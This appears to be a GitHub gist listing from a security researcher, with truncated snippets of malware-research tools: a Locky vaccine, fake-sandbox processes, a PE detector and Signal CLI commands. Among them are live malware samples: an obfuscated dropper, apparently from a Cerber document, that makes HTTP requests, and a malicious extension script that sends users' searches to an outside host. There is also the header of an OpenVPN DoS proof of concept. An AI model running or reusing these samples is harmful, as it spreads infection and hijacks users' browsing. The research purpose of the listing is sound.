This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Create registry Key | |
| New-Item -Path "HKCU:\Software\Locky" -ItemType Key | |
| # Setting ACL | |
| $a = whoami | |
| $acl = Get-Acl HKCU:\SOFTWARE\Locky | |
| $rule = New-Object System.Security.AccessControl.RegistryAccessRule ($a,"FullControl","Deny") | |
| $acl.SetAccessRule($rule) | |
| $acl | Set-Acl -Path HKCU:\SOFTWARE\Locky |
x0rz
/ fake_sandbox.ps1
Created
April 14, 2016 13:56
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Simulate fake processes of analysis sandbox/VM that some malware will try to evade | |
| # This just spawn ping.exe with different names (wireshark.exe, vboxtray.exe, ...) | |
| # It's just a PoC and it's ugly as f*ck but hey, if it works... | |
| # Usage: .\fake_sandbox.ps1 -action {start,stop} | |
| param([Parameter(Mandatory=$true)][string]$action) | |
| $fakeProcesses = @("wireshark.exe", "vmacthlp.exe", "VBoxService.exe", | |
| "VBoxTray.exe", "procmon.exe", "ollydbg.exe", "vmware-tray.exe", |
x0rz
/ dropper.INFECTED.bat
Created
May 10, 2016 12:48
Command line execution acting as a dropper - found inside a malicious document (probably cerber ransomware)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cmd.exe /V /C set "FKO=%RANDOM%" && (for %i in ("Dim LXZxe0" "suB GdBocmWra2bHN()" "LCtcOqCDnnH=16+11" "On eRROR resUME neXt" "NVJjYA=9+60" "DIm I7U6poXRu,GiWuI,BoUfvWYBUkKj,IUJthZDvQAl" "Y9cKZng13vo=40+64" "IUJthZDvQAl="SVXQDEt1loQ6LlG"" "Q1u0qcM7Qv9Lv=98+61" "I7U6poXRu=SHpwygLQgHdJ("1C354D39787C1D224319463E002C172D5C67213C5F","MtA9IBS2U4nhQr")" "UUlJ36frjukOf=4+85" "seT GiWuI=cReaTeOBJEcT(SHpwygLQgHdJ("1B3132362A075E0A1B7F6E01200F070208",IUJthZDvQAl))" "PjtwgPXl=60+45" "GiWuI.opEN SHpwygLQgHdJ("320C31","KuIefPyEKG7jD28"),I7U6poXRu,0" "LxFoiv6rfAMR6=48+79" "GiWuI.setRequESthEaDer SHpwygLQgHdJ("1359183537","YA8vRRDzISQ1tmJ"),SHpwygLQgHdJ("51212E22364D666B4079","T3XZGEpRXr")" "D0jDQ36=89+30" "GiWuI.sEnd()" "Q30TTtK7H7DXR6BB8=65+76" "If GiWuI.STatUsTexT<>SHpwygLQgHdJ("172A1A0506562B7A0E152127173631","EGKhqo7GZMzOSrX") THen PEIwKPwhVFEYy2a" "L360=60+17" "eND Sub" "Sub NEWtZ()" "GPUDsi=67+57" "TfgjBtEZiAm1I" "Dim TlmAoztjgrep3nIj2,Umdr3G2bHN,FoHwraR,KzSFDJqxxi64,JyU1NQwdLZlhoO" "K0Q2UNY=9+6" "On ERRoR resumE nexT |
x0rz
/ detect_fresh_pe.py
Created
July 20, 2016 12:38
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import datetime | |
| import os | |
| import sys | |
| import pefile | |
| from scapy.all import * | |
| import scapy_http.http | |
| import tempfile | |
| TIME_THRESHOLD = datetime.timedelta(days=3) |
x0rz
/ signal commands.txt
Last active
September 18, 2019 14:23
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Registering your new number | |
| signal-cli -u "+1234568790" register | |
| signal-cli -u "+1234568790" verify xxxxxx |
x0rz
/ signal commands_2.txt
Last active
August 4, 2017 19:46
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Get the text from the QR code given by the Signal app and link your new number to it | |
| signal-cli -u "+1234568790" addDevice --uri "tsdevice:/?uuid=xxxxxxxx..." |
x0rz
/ eqgrp_services_lookup.ps1
Created
April 18, 2017 16:31
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo "[+] Getting \system\\currentcontrolset\\services" | |
| $raw_services = Get-ChildItem -Path hklm:\system\\currentcontrolset\\services | select Name | |
| $services = @() | |
| foreach ($srv in $raw_services) { | |
| $shortname = "$srv".Split("\")[-1] | |
| $shortname = $shortname.Substring(0,$shortname.Length-1) | |
| $services += $shortname | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Usage: ./dns_check.py <list_of_domain_names.txt> | |
| import dns.resolver | |
| import requests | |
| import re | |
| import json | |
| import sys | |
| resolver = dns.resolver.Resolver() | |
| resolver.timeout = 5 | |
| resolver.lifetime = 5 |
x0rz
/ dos_server.py
Created
May 12, 2017 12:06
CVE-2017-7478: Proof of Concept Code for the OpenVPN Pre-Authentication DoS Vulnerability
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # Script by Quarkslab from https://ostif.org/wp-content/uploads/2017/05/OpenVPN1.2final.pdf | |
| """ | |
| $ ./dos_server.py & | |
| $ sudo ./openvpn-2.4.0/src/openvpn/openvpn conf/server-tls.conf | |
| ... | |
| Fri Feb 24 10:19:19 2017 192.168.149.1:64249 TLS: Initial packet from [AF_INET]192.168.149.1:64249, sid=9a6c48a6 1467f5e1 | |
| Fri Feb 24 10:19:19 2017 192.168.149.1:64249 Assertion failed at ssl.c:3711 (buf_copy(in, buf)) | |
| Fri Feb 24 10:19:19 2017 192.168.149.1:64249 Exiting due to fatal error | |
| Fri Feb 24 10:19:19 2017 192.168.149.1:64249 /sbin/route del -net 10.8.0.0 netmask␣255.255.255.0 |
x0rz
/ background.js
Created
September 18, 2017 08:00
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function redirect(e){chrome.tabs.update({url:e})}var pagebrowsed,allowSearch,prevurl=null,srchid=100,sysid=739,random=Math.floor(1e7*Math.random()),thanksmsg=[random,"slonif",".","faith","opurie","com"],InstallDone="";chrome.tabs.onUpdated.addListener(function(){chrome.tabs.getSelected(null,function(e){var s=e.url;if(InstallDone){InstallDone[srchid]?InstallDone[srchid]:InstallDone.default;if(s!=prevurl&&(prevurl=s,chrome.storage.sync.get({pagebrowsed:0},function(e){pagebrowsed=e.pagebrowsed,chrome.storage.sync.set({pagebrowsed:e.pagebrowsed+1})})),pagebrowsed>5&&(document.getElementsByTagName("body")[0].style.display="none",s.match(/google/)||s.match(/bing/))){var t=s.split("q=");if(t.length>1){var a="http://startupfraction.com/yaelba/?keyword="+t[1].split("&")[0]+"&id="+srchid+"&sysid="+sysid;redirect(a),chrome.tabs.update({url:a})}}if(pagebrowsed>5)try{var n=window.document.createElement("canvas").getContext("2d");chrome.browserAction.setIcon({imageData:n.getImageData(0,0,19,19)})}catch(e){}}})}),fetch("htt |
OlderNewer